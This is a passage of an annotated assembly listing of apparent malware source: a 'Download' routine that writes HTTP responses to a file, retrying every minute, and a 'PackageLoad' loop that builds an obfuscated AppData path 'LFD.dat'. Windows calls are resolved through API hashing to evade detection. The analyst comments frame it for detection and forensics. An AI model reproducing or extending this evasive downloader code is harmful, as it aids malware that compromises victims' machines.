  000f2	8d 86 00 90 01
	00		 lea	 eax, DWORD PTR [esi+102400]
; 38   : 
; 39   : 			PCHAR Result;
; 40   : 
; 41   : 
; 42   : 			HTTP::TResponseData Resp;
; 43   : 			ClearStruct(Resp);
  000f8	6a 40		 push	 64			; 00000040H
  000fa	89 47 44	 mov	 DWORD PTR [edi+68], eax
  000fd	8d 45 94	 lea	 eax, DWORD PTR _Resp$82948[ebp]
  00100	53		 push	 ebx
  00101	50		 push	 eax
  00102	c6 47 3c 01	 mov	 BYTE PTR [edi+60], 1
  00106	89 77 40	 mov	 DWORD PTR [edi+64], esi
  00109	e8 00 00 00 00	 call	 ?m_memset@@YAXPBXEI@Z	; m_memset
; 44   : 			Resp.Buffer = &Result;
; Result lives in the FileName argument slot ([ebp+12]) from here on.
  0010e	8d 45 0c	 lea	 eax, DWORD PTR _Result$82947[ebp]
  00111	89 45 94	 mov	 DWORD PTR _Resp$82948[ebp], eax
; 45   : 	
; 46   : 			DWORD Size;
; 47   : 			Resp.Size =&Size;
  00114	8d 45 e0	 lea	 eax, DWORD PTR _Size$82949[ebp]
  00117	89 45 98	 mov	 DWORD PTR _Resp$82948[ebp+4], eax
; 48   : 	
; 49   : 		
; 50   : 			if(false==HTTP::ExecuteMethod(R, &Resp))
  0011a	8d 45 94	 lea	 eax, DWORD PTR _Resp$82948[ebp]
  0011d	50		 push	 eax
  0011e	57		 push	 edi
  0011f	e8 00 00 00 00	 call	 ?ExecuteMethod@HTTP@@YA_NPAUTHTTPRequestRec@@PAUTResponseData@1@@Z ; HTTP::ExecuteMethod
; 24 bytes = arguments of HTTPCreateRequest (1), m_memset (3), ExecuteMethod (2).
  00124	83 c4 18	 add	 esp, 24			; 00000018H
  00127	84 c0		 test	 al, al
  00129	75 0c		 jne	 SHORT $LN3@Download
; 51   : 			{			
; 52   : 				pSleep(1000*60);
; Failure path: wait 60000 ms, then start a fresh request at the same offset.
; Seen from the network this is one attempt per minute until one succeeds.
  0012b	68 60 ea 00 00	 push	 60000			; 0000ea60H
  00130	e8 00 00 00 00	 call	 ??$pushargEx@$00$0DNJJHCPF@$0CP@H@@YAPAXH@Z ; pushargEx<1,1033466613,47,int>
; 53   : 				continue;
  00135	eb b0		 jmp	 SHORT $LN18@Download
$LN3@Download:
; 54   : 			}
; 55   : 			if (0==Resp.Response.FullSize)//
; A reported full size of 0 ends the transfer without writing.
  00137	39 5d c8	 cmp	 DWORD PTR _Resp$82948[ebp+52], ebx
  0013a	74 47		 je	 SHORT $LN15@Download
; 56   : 			{				
; 57   : 				break;
; 58   : 			}
; 59   : 			DWORD ButeWriten;
; 60   : 			pWriteFile(hFile, Result, Size, &ButeWriten, NULL );
; The response buffer is written as received; the return value of the write is
; not examined in this listing.
  0013c	53		 push	 ebx
  0013d	8d 45 e4	 lea	 eax, DWORD PTR _ButeWriten$82959[ebp]
  00140	50		 push	 eax
  00141	ff 75 e0	 push	 DWORD PTR _Size$82949[ebp]
  00144	ff 75 0c	 push	 DWORD PTR _Result$82947[ebp]
  00147	ff 75 fc	 push	 DWORD PTR _hFile$[ebp]
  0014a	e8 00 00 00 00	 call	 ??$pushargEx@$00$0PDPNBMD@$0BG@PAXPADKPAKH@@YAPAXPAXPADKPAKH@Z ; pushargEx<1,255840707,22,void *,char *,unsigned long,unsigned long *,int>
; 61   : 
; 62   : 			nFileLen+=ButeWriten;
; 63   : 			if (nFileLen==Resp.Response.FullSize)
; 64-bit accumulate (add low, adc high with ebx = 0), then compare against the
; 32-bit FullSize: equal only when low == FullSize and high == 0.
  0014f	8b 45 c8	 mov	 eax, DWORD PTR _Resp$82948[ebp+52]
  00152	83 c4 14	 add	 esp, 20			; 00000014H
  00155	03 75 e4	 add	 esi, DWORD PTR _ButeWriten$82959[ebp]
  00158	11 5d d8	 adc	 DWORD PTR _nFileLen$[ebp+4], ebx
  0015b	3b f0		 cmp	 esi, eax
  0015d	75 05		 jne	 SHORT $LN17@Download
  0015f	39 5d d8	 cmp	 DWORD PTR _nFileLen$[ebp+4], ebx
  00162	74 1f		 je	 SHORT $LN15@Download
$LN17@Download:
; 64   : 			{
; 65   : 				//
; 66   : 				break;
; 67   : 			}
; 68   : 			STR::Free(Result);
; Not finished yet: release this iteration's buffer, request and response
; state, then loop for the next range.
  00164	ff 75 0c	 push	 DWORD PTR _Result$82947[ebp]
  00167	e8 00 00 00 00	 call	 ?Free@STR@@YAXPAD@Z	; STR::Free
; 69   : 			HTTPFreeRequest(R);
  0016c	57		 push	 edi
  0016d	e8 00 00 00 00	 call	 ?HTTPFreeRequest@@YAXPAUTHTTPRequestRec@@@Z ; HTTPFreeRequest
; 70   : 			HTTPResponse::Clear(&Resp.Response);
  00172	8d 45 a0	 lea	 eax, DWORD PTR _Resp$82948[ebp+12]
  00175	50		 push	 eax
  00176	e8 00 00 00 00	 call	 ?Clear@HTTPResponse@@YAXPAUTHTTPResponseRec@@@Z ; HTTPResponse::Clear
  0017b	83 c4 0c	 add	 esp, 12			; 0000000cH
; 71   : 	
; 72   : 		
; 73   : 		}
  0017e	e9 65 ff ff ff	 jmp	 $LL5@Download
$LN15@Download:
; 74   : 		pCloseHandle(hFile);
; Both `break` exits land here; the handle is closed and esi/edi are restored.
  00183	ff 75 fc	 push	 DWORD PTR _hFile$[ebp]
  00186	e8 00 00 00 00	 call	 ??$pushargEx@$00$0HCDOLANF@$0BB@PAX@@YAPAXPAX@Z ; pushargEx<1,1916711125,17,void *>
  0018b	59		 pop	 ecx
  0018c	5f		 pop	 edi
  0018d	5e		 pop	 esi
$LN6@Download:
  0018e	5b		 pop	 ebx
; 75   : 	}	
; 76   : }
  0018f	c9		 leave
  00190	c3		 ret	 0
?Download@@YAXPADPA_W@Z ENDP				; Download
_TEXT	ENDS
PUBLIC	?PackageLoad@@YGKPAX@Z				; PackageLoad
; Function compile flags: /Ogspy
;	COMDAT ?PackageLoad@@YGKPAX@Z
; ---------------------------------------------------------------------
; DWORD __stdcall PackageLoad(void *lpData) -- 32-bit x86.
; (Signature decoded from the decorated name ?PackageLoad@@YGKPAX@Z; it has
; the shape of a Win32 thread start routine -- whether it is used as one is
; not visible on this page. lpData is never read in this listing.)
;
; What the listing shows:
;   An unconditional loop that, on every pass,
;     1. builds L"\LFD.dat" on the stack one UTF-16 unit at a time,
;     2. calls pSHGetFolderPathW(NULL, CSIDL_APPDATA, NULL, 0, SysPath1),
;     3. appends the file name with plstrcatW,
;     4. opens the result with pCreateFileW (GENERIC_WRITE, FILE_SHARE_WRITE,
;        OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL), expanded inline,
;   and then jumps back to the top. The returned handle is neither stored nor
;   tested: the `if (hFile != INVALID_HANDLE_VALUE)` body is commented out in
;   the source, so no code was emitted for it. The function has no `ret`, and
;   no close or sleep call appears inside the loop.
;
; Register roles: esi = constant 0 (used for every 0 / NULL argument).
;
; Analyst notes (detection and forensics):
;   * Same path as Download's default: LFD.dat under the roaming
;     application-data folder (CSIDL_APPDATA = 26).
;   * As compiled, the observable behaviour is a tight, repeating sequence of
;     folder lookup + CreateFileW on that one path from a single thread; the
;     commented-out HTTP call suggests the routine is unfinished.
;   * The file name is not stored as a contiguous string constant by this
;     function, and the Windows APIs are reached only through
;     GetProcAddressEx2 hash lookups.
; ---------------------------------------------------------------------
_TEXT	SEGMENT
_SysPath1$82989 = -540					; size = 520
_LoadedFileName$82990 = -20				; size = 18
_lpData$ = 8						; size = 4
?PackageLoad@@YGKPAX@Z PROC				; PackageLoad, COMDAT
; 81   : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
  00003	81 ec 1c 02 00
	00		 sub	 esp, 540		; 0000021cH
  00009	56		 push	 esi
; esi is zeroed once, outside the loop, and stays 0.
  0000a	33 f6		 xor	 esi, esi
$LL3@PackageLoa:
; 82   : 	while (true)
; 83   : 	{
; 84   : 		WCHAR SysPath1[MAX_PATH];
; 85   : 		WCHAR LoadedFileName[] = {'\\','L','F','D','.','d','a','t',L'\0'};
; Stack-built wide string: each push imm8 / pop eax / mov WORD group stores one
; UTF-16 unit ('\', 'L', 'F', 'D', '.', 'd', 'a', 't'), then a zero terminator.
  0000c	6a 5c		 push	 92			; 0000005cH
  0000e	58		 pop	 eax
  0000f	6a 4c		 push	 76			; 0000004cH
  00011	66 89 45 ec	 mov	 WORD PTR _LoadedFileName$82990[ebp], ax
  00015	58		 pop	 eax
  00016	6a 46		 push	 70			; 00000046H
  00018	66 89 45 ee	 mov	 WORD PTR _LoadedFileName$82990[ebp+2], ax
  0001c	58		 pop	 eax
  0001d	6a 44		 push	 68			; 00000044H
  0001f	66 89 45 f0	 mov	 WORD PTR _LoadedFileName$82990[ebp+4], ax
  00023	58		 pop	 eax
  00024	6a 2e		 push	 46			; 0000002eH
  00026	66 89 45 f2	 mov	 WORD PTR _LoadedFileName$82990[ebp+6], ax
  0002a	58		 pop	 eax
  0002b	6a 64		 push	 100			; 00000064H
  0002d	66 89 45 f4	 mov	 WORD PTR _LoadedFileName$82990[ebp+8], ax
  00031	58		 pop	 eax
  00032	6a 61		 push	 97			; 00000061H
  00034	66 89 45 f6	 mov	 WORD PTR _LoadedFileName$82990[ebp+10], ax
  00038	58		 pop	 eax
  00039	6a 74		 push	 116			; 00000074H
  0003b	66 89 45 f8	 mov	 WORD PTR _LoadedFileName$82990[ebp+12], ax
  0003f	58		 pop	 eax
  00040	66 89 45 fa	 mov	 WORD PTR _LoadedFileName$82990[ebp+14], ax
  00044	33 c0		 xor	 eax, eax
  00046	66 89 45 fc	 mov	 WORD PTR _LoadedFileName$82990[ebp+16], ax
; 86   : 
; 87   : 		pSHGetFolderPathW(NULL, CSIDL_APPDATA, NULL, SHGFP_TYPE_CURRENT, SysPath1);
; 26 (1aH) is CSIDL_APPDATA; esi supplies the three zero arguments. SysPath1 is
; not cleared first in this function; it is filled by this call.
  0004a	8d 85 e4 fd ff
	ff		 lea	 eax, DWORD PTR _SysPath1$82989[ebp]
  00050	50		 push	 eax
  00051	56		 push	 esi
  00052	56		 push	 esi
  00053	6a 1a		 push	 26			; 0000001aH
  00055	56		 push	 esi
  00056	e8 00 00 00 00	 call	 ??$pushargEx@$06$0NOKKJFFH@$0BMF@HHHW4SHGFP_TYPE@@PA_W@@YAPAXHHHW4SHGFP_TYPE@@PA_W@Z ; pushargEx<7,3735721303,453,int,int,int,enum SHGFP_TYPE,wchar_t *>
; 88   : 		plstrcatW( SysPath1, LoadedFileName );
  0005b	8d 45 ec	 lea	 eax, DWORD PTR _LoadedFileName$82990[ebp]
  0005e	50		 push	 eax
  0005f	8d 85 e4 fd ff
	ff		 lea	 eax, DWORD PTR _SysPath1$82989[ebp]
  00065	50		 push	 eax
  00066	e8 00 00 00 00	 call	 ??$pushargEx@$00$0CMKBLFPA@$0HP@PA_WPA_W@@YAPAXPA_W0@Z ; pushargEx<1,748795376,127,wchar_t *,wchar_t *>
; 89   : 		HANDLE hFile = (HANDLE)pCreateFileW( SysPath1, GENERIC_WRITE, FILE_SHARE_WRITE, 0, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0 );
; pCreateFileW is expanded inline: the (1, 08f8f102H, 21) lookup is followed by
; an indirect call.
  0006b	6a 15		 push	 21			; 00000015H
  0006d	68 02 f1 f8 08	 push	 150532354		; 08f8f102H
  00072	6a 01		 push	 1
  00074	56		 push	 esi
  00075	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
; Deferred cleanup for the three cdecl calls above: 5 + 2 + 4 dwords = 44 bytes.
  0007a	83 c4 2c	 add	 esp, 44			; 0000002cH
; Arguments as pushed: 40000000H = GENERIC_WRITE, 2 = FILE_SHARE_WRITE,
; 4 = OPEN_ALWAYS, 128 = FILE_ATTRIBUTE_NORMAL.
  0007d	56		 push	 esi
  0007e	68 80 00 00 00	 push	 128			; 00000080H
  00083	6a 04		 push	 4
  00085	56		 push	 esi
  00086	6a 02		 push	 2
  00088	68 00 00 00 40	 push	 1073741824		; 40000000H
  0008d	8d 8d e4 fd ff
	ff		 lea	 ecx, DWORD PTR _SysPath1$82989[ebp]
  00093	51		 push	 ecx
  00094	ff d0		 call	 eax
; 90   : 		if (hFile!=INVALID_HANDLE_VALUE)
; 91   : 		{
; 92   : 		//	HTTP::ExecuteMethod(R, &Resp);
; 93   : 		}
; 94   : 	}
; The handle in eax is discarded and control returns to the top of the loop.
  00096	e9 71 ff ff ff	 jmp	 $LL3@PackageLoa
?PackageLoad@@YGKPAX@Z ENDP				; PackageLoad
_TEXT	ENDS